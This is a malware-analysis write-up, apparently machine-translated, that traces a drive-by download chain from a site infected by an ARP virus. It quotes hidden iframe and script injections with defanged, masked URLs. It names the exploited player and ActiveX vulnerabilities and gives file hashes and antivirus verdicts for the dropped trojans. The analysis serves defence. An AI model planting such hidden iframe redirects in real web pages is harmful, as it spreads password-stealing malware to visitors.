Spread of ARP virus websites such as Trojan. psw. win32.onlinegames. gen
Original endurer
1st-
The virus adds code to the webpage:
/---
<IFRAME src = hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/Shui **/4.htm width = 0 Height = 0> </iframe>
---/
1 hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/Shui **/4.htm
Code included:
/---
<IFRAME src = hxxp: // www. I ** mm ** M * QM. ***. CN/h.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // D * m *. 1 ** 7ti ** ng ** gieba *. CN/c2.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/10wip.htm> </iframe>
---/
1.1 hxxp: // www. I ** mm ** M * QM. ***. CN/h.htm contains the Code:
/---
<IFRAME src = hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/cn3100.htm? BB? 6 width = 0 Height = 0> </iframe>
---/
1.1.1 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. ***. CN/VIP/cn3100.htm? BB? 6. Include and output the Code:
/---
<IFRAME src = wm2/index.html width = 1 Height = 1 border = 1> </iframe>
<IFRAME Style = display: None src = "2.gif"> </iframe>
<IFRAME Style = display: None src = "8.gif"> </iframe>
<IFRAME Style = display: None src = "1.gif"> </iframe>
<IFRAME Style = display: None src = "5.gif"> </iframe>
<IFRAME Style = display: None src = "11.gif"> </iframe>
<IFRAME Style = display: None src = "4.gif"> </iframe>
<IFRAME Style = display: None src = "12.gif" width = 100 Height = 1> </iframe>
<IFRAME Style = display: None src = "2.gif"> </iframe>
---/
1.1.1.1.1 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/1.gif
Download hxxp: // 20 *** 08*02*03. Se ** R ** Vice-Google. ***. CN/bf.exe with the storm video Vulnerability
File Description: D:/test/bf.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 20:37:50
Modified on: 20:37:50
Access time: 20:38:47
Size: 7368 bytes, 7.200 KB
MD5: 194872cfd1ab7a9f7bf2c7fc27997c02
Sha1: 5cb01436d73551e0c60775a7049870bcb9fec91c
CRC32: 7c458325
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ppu, rising reports Trojan. psw. win32.onlinegames. gen
1.1.1.1.2 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/2.gif
Use the ms0614 vulnerability to download hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. ***. CN/614.exe
614. EXE is the same as bf.exe.
1.1.1.1.3 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/3.gif
Use the qvod Player Plug-in vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/qvod.exe
Qvod.exeis the same as bf.exe.
1.1.1.1.4 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/4.gif
Use baidubar. tool to download hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. ***. CN/X. Cab
X.exe in X. Cab is the same as bf.exe.
1.1.1.1.5 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/5.gif
Use the PPStream vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/pps.exe
Pps.exe is the same as bf.exe.
1.1.1.1.6 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/6.gif contains the Code:
/---
<IFRAME src = hxxp: // 20 *** 08*02*21. se * r ** Vice-Google. ***. CN/VIP/OK _ OK .htm width = 0 Height = 0 border = 0> </iframe>
---/
1.1.1.1.6.1 hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. **. CN/VIP/OK _ OK .htm contains the Code:
/---
<IFRAME src = wm2/z.html width = 1 Height = 1 border = 0> </iframe>
---/
1.1.1.1.6.1.1 hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. **. CN/VIP/wm2/z.html
Content is the same as 1.1.1
1.1.1.1.7 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/7.gif
Same as 6.gif
1.1.1.1.8 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/8.gif
Use the RealPlayer vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/real.exe
Real.exe is the same as 6.gif.
1.1.1.1.9 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/9.gif
Same as 6.gif
1.1.1.1.10 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/10.gif
Same as 6.gif
1.1.1.1.11 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/11.gif
Download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. **. CN/lz3.exe by exploiting the glchat. ocx Vulnerability in the Internet world
Lz3.exe is the same as bf.exe.
1.1.1.1.12 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/12.gif
Use the thunder vulnerability to download hxxp: // 20 ** 08*02*24. Se * r ** Vice-Google. ***. CN/xl.exe
Xl.exe is the same as bf.exe.
1.1.1.1.13 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/13.gif
Same as 6.gif
1.2 hxxp: // D * m *. 1 ** 7ti ** ng ** gieba *. CN/c2.htm contains the Code:
/---
<IFRAME src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/6664301.htm? Id = XSL width = 100 Height = 0> </iframe>
---/
1.2.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/6664301.htm? Id = XSL contains code:
/---
<IFRAME srcw.htm.html width = 100 Height = 0> </iframe>
---/
1.2.1.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/htm.html contains and outputs the Code:
/---
<IFRAME width = 100 Height = 0 src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/rl.htm> </iframe>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/1.js> </SCRIPT>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/bf.js> </SCRIPT>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/pps.js> </SCRIPT>
<IFRAME width = '10' Height = '10' src = 'hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/3.htm'> </iframe>
---/
1.2.1.1.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/rl.htm
Use the RealPlayer vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/rl.exe
File Description: D:/test/rl.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 20:55:38
Modified on: 20:55:38
Access time: 20:56:21
Size: 23717 bytes, 23.165 KB
MD5: bfaf373042d10517fdc0fe713bbeb093
Sha1: ad5e17bd40a7604ea3fda5a35b372fbb5ba7df2e
CRC32: b6ea58c4
Kaspersky for Trojan-Downloader.Win32.Delf.epw "nspack, rising report for Trojan. DL. win32.direct. Me" iftdll
1.2.1.1.2 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/1.js
Use the ms0614 vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/014.exe
014. EXE is the same as rl.exe.
1.2.1.1.3 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/bf.js
Download hxxp: // exe. x * In ** Nia * NK * l.com/bf.exe
Bf.exe is the same as rl.exe.
1.2.1.1.4 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/pps.js
Use the PPS vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/pps.exe
Pps.exe is the same as rl.exe.
1.2.1.1.5 use baidubar. tool to download hxxp: // exe. x * In ** Nia * NK * l.com/ad.cab
The bd.exe and rl.exe contained in AD. Cab are the same.
1.2.1.1.6 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/3.htm
Download hxxp: // exe. x * In ** Nia * NK * l.com/lz.exe by using the hangameplugincn18.dll, CLSID: Taobao, the main program glworld ActiveX control in the game hall of the Internet world.
Lz.exe is the same as rl.exe.
1.3 hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/10wip.htm contains the Code:
/---
<IFRAME src = "hxxp: // www. ** 5 ** 9 *. VC/page/add_753643.htm? 111222222 "width = 0 Height = 0> </iframe>
---/
1.3.1 hxxp: // www. ** 5 ** 9 *. VC/page/add_753643.htm? 111222222 contains code:
/---
<SCRIPT src = ADDR. js> </SCRIPT>
---/
1.3.1.1 hxxp: // www. ** 5 ** 9 *. VC/page/ADDR. js
The code is unique and checks whether Kaspersky internetsecurity6.0 is installed on the viewer's computer.
Output code:
/---
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1 ** 8 ***. VG/baidu.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/bf.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/ms.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/real.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1 ** 8 ***. VG/lz.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/xl.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/ms.gif"> </iframe>
---/
1.3.1.1.1 hxxp: // ***. W *** 1 *** 8 ***. VG/baidu.gif
Use baidubar. tool.1 to download hxxp: // ***. W *** 1 *** 8 ***. VG/Calc. Cab
Calc. Cab contains s.exe
File Description: D:/test/s.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:34:34
Modification time: 23:34:34
Access time:
Size: 1444 bytes, 1.420 KB
MD5: 1b27b0c37f725a140955de91c58e2266
Sha1: 95fe224a524ef3c0bbcf5494ddef5e86b3926db3
CRC32: 2c2ce980
Kaspersky for Trojan-Downloader.Win32.Tiny.aid, rising for Trojan. DL. win32.inject. Small M upack0.39
1.3.1.1.2 hxxp: // ***. W *** 1 *** 8 ***. VG/bf.gif
File does not exist
1.3.1.1.3 hxxp: // ***. W *** 1 *** 8 ***. VG/ms.gif
Use the MS 0614 vulnerability to download hxxp: // ***. W *** 1 *** 8 ***. VG/s.exe
1.3.1.1.4 hxxp: // ***. W *** 1 *** 8 ***. VG/real.gif
Use the RealPlayer vulnerability to download hxxp: // ***. W *** 1 *** 8 ***. VG/s.exe
1.3.1.1.5 hxxp: // ***. W *** 1 *** 8 ***. VG/lz.gif
Use the world glchat. OCX (CLSID: AE93C5DF-A990-11D1-AEBD-5254ABDD2B69, _ licensed_to _ = "huyufeng";) vulnerability download: hxxp ://***. W ** 1*8 ***. VG/s.exe
1.3.1.1.6 hxxp: // ***. W *** 1 *** 8 ***. VG/xl.gif
Use thunder look (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F, _ licensed_to _ = "huyufeng";) vulnerability download: hxxp: // ***. W *** 1*8 ***. VG/s.exe